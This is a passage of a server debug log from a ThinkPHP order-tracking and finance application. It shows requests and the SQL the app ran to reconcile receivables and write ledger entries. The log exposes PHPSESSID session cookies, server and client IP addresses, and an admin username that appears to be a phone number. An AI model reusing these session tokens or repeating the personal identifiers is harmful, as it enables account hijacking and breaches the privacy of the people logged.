'shoukuan_status-3' => '1', 'shoukuan_status-4' => '1', 'ids' => '1763', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001496s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007174s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000475s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001411s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000560s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001478s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001090s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001652s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000387s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.001317s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001265s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001460s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001191s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.001336s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '1763' [ RunTime:0.002594s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5,`price`=0.8,`money`=4 WHERE `id` = 3074 [ RunTime:0.004562s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountsreceivable` [ RunTime:0.001521s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001396s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (187 , 40 , 6633 , 1211 , 1763 , 3074 , 1 , 2022 , 7 , 20 , '50W长条底壳5个' , 1658308064 , 4 , 7784771.82) [ RunTime:0.002578s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001451s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (187 , 40 , 6633 , 1211 , 1763 , 3074 , 1 , 2022 , 7 , 20 , '50W长条底壳5个' , 1658308064 , 4 , 7784767.82) [ RunTime:0.004935s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_ladger` [ RunTime:0.001486s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.000889s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (4 , -575849.51558402 , 2536 , 5 , '50W长条底壳5个' , 40 , 20 , 7 , 2022 , 1658308064) [ RunTime:0.006436s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5,`price`=0.35,`money`=1.75 WHERE `id` = 3075 [ RunTime:0.005669s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001377s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (187 , 40 , 6634 , 1212 , 1763 , 3075 , 1 , 2022 , 7 , 20 , '50W长条上盖5个' , 1658308064 , 1.75 , 7784773.57) [ RunTime:0.004855s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001488s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (187 , 40 , 6634 , 1212 , 1763 , 3075 , 1 , 2022 , 7 , 20 , '50W长条上盖5个' , 1658308064 , 1.75 , 7784770.07) [ RunTime:0.005509s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.000925s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (1.75 , -575847.76558402 , 2538 , 5 , '50W长条上盖5个' , 40 , 20 , 7 , 2022 , 1658308064) [ RunTime:0.005355s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5,`price`=1.2,`money`=6 WHERE `id` = 3076 [ RunTime:0.008474s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001497s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (187 , 40 , 6635 , 1209 , 1763 , 3076 , 1 , 2022 , 7 , 20 , '100W长条底壳5个' , 1658308064 , 6 , 7784777.82) [ RunTime:0.006587s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001325s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (187 , 40 , 6635 , 1209 , 1763 , 3076 , 1 , 2022 , 7 , 20 , '100W长条底壳5个' , 1658308064 , 6 , 7784765.82) [ RunTime:0.004913s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001022s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (6 , -575841.76558402 , 2540 , 5 , '100W长条底壳5个' , 40 , 20 , 7 , 2022 , 1658308064) [ RunTime:0.004262s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5,`price`=0.8,`money`=4 WHERE `id` = 3077 [ RunTime:0.006769s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001272s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (187 , 40 , 6636 , 1210 , 1763 , 3077 , 1 , 2022 , 7 , 20 , '100W长条上盖5个' , 1658308064 , 4 , 7784775.82) [ RunTime:0.005627s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001187s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (187 , 40 , 6636 , 1210 , 1763 , 3077 , 1 , 2022 , 7 , 20 , '100W长条上盖5个' , 1658308064 , 4 , 7784767.82) [ RunTime:0.004808s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.000786s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (4 , -575837.76558402 , 2542 , 5 , '100W长条上盖5个' , 40 , 20 , 7 , 2022 , 1658308064) [ RunTime:0.004790s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001369s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 校对应收账款 核对' , '{\"dialog\":\"1\",\"kehu_id\":[\"\\u6837\\u54c1\",\"187\"],\"verify_amount\":[\"5\",\"5\",\"5\",\"5\"],\"price\":[\"0.8000000000\",\"0.3500000000\",\"1.2000000000\",\"0.8000000000\"],\"money\":[\"4.0000000000\",\"1.7500000000\",\"6.0000000000\",\"4.0000000000\"],\"explain\":[\"50W\\u957f\\u6761\\u5e95\\u58f35\\u4e2a\",\"50W\\u957f\\u6761\\u4e0a\\u76d65\\u4e2a\",\"100W\\u957f\\u6761\\u5e95\\u58f35\\u4e2a\",\"100W\\u957f\\u6761\\u4e0a\\u76d65\\u4e2a\"],\"shoukuan_status-1\":\"1\",\"shoukuan_status-2\":\"1\",\"shoukuan_status-3\":\"1\",\"shoukuan_status-4\":\"1\",\"ids\":\"1763\"}' , '/admin/financial/verifybill/hedui/ids/1763?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308064) [ RunTime:0.004385s ] --------------------------------------------------------------- [ 2022-07-20T17:07:44+08:00 ] 106.112.205.110 GET /admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222022-06-20+00%3A00%3A00%22%2C%22end_time%22%3A%222022-07-20+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1658306703524 [ info ] 47.105.33.115:8081/admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222022-06-20+00%3A00%3A00%22%2C%22end_time%22%3A%222022-07-20+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1658306703524 [运行时间:0.076301s][吞吐率:13.11req/s] [内存消耗:5,689.91kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001217s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2022-06-20 00:00:00","end_time":"2022-07-20 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1658306703524', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001699s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000101s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000461s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001341s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000461s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001211s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001079s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001788s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000336s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.001160s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000995s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000982s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM ( SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount,count(*) FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE ( outbound.createtime > 1655654400 ) AND ( outbound.createtime <= 1658332799 ) AND `outboundandorder`.`verify_status` = 0 AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC ) `_group_count_` LIMIT 1 [ RunTime:0.003612s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE `outboundandorder`.`verify_status` = 0 AND ( outbound.createtime > 1655654400 ) AND ( outbound.createtime <= 1658332799 ) AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.003223s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 1759 [ RunTime:0.001941s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 1758 [ RunTime:0.001803s ] --------------------------------------------------------------- [ 2022-07-20T17:07:46+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [运行时间:0.052636s][吞吐率:19.00req/s] [内存消耗:4,769.87kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001131s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001655s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000503s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001534s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000475s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001546s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001008s ] [ sql ] [ SQL ] SELECT 